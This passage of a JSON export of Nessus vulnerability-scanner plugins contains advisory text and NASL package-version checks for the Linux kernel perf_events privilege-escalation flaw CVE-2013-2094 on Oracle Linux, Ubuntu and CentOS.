}\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:58", "description": "From Red Hat Security Advisory 2013:0830 :\n\nUpdated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : kernel (ELSA-2013-0830)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2013-0830.NASL", "href": "https://www.tenable.com/plugins/nessus/68823", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0830 and \n# Oracle Linux Security Advisory ELSA-2013-0830 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68823);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"RHSA\", value:\"2013:0830\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2013-0830)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0830 :\n\nUpdated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-May/003476.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2013-0830\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-doc-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-firmware-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:37", "description": "An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2013-05-16T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-1828-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1828-1.NASL", "href": "https://www.tenable.com/plugins/nessus/66471", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1828-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66471);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"USN\", value:\"1828-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-1828-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1828-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.5-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1828-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.5.0-30-generic\", pkgver:\"3.5.0-30.51~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:28:45", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.", "edition": 26, "published": "2013-05-21T00:00:00", "title": "CentOS 6 : kernel (CESA-2013:0830)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-21T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-firmware", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2013-0830.NASL", "href": "https://www.tenable.com/plugins/nessus/66521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0830 and \n# CentOS Errata and Security Advisory 2013:0830 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66521);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"RHSA\", value:\"2013:0830\");\n\n script_name(english:\"CentOS 6 : kernel (CESA-2013:0830)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-May/019733.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?001479ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2094\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 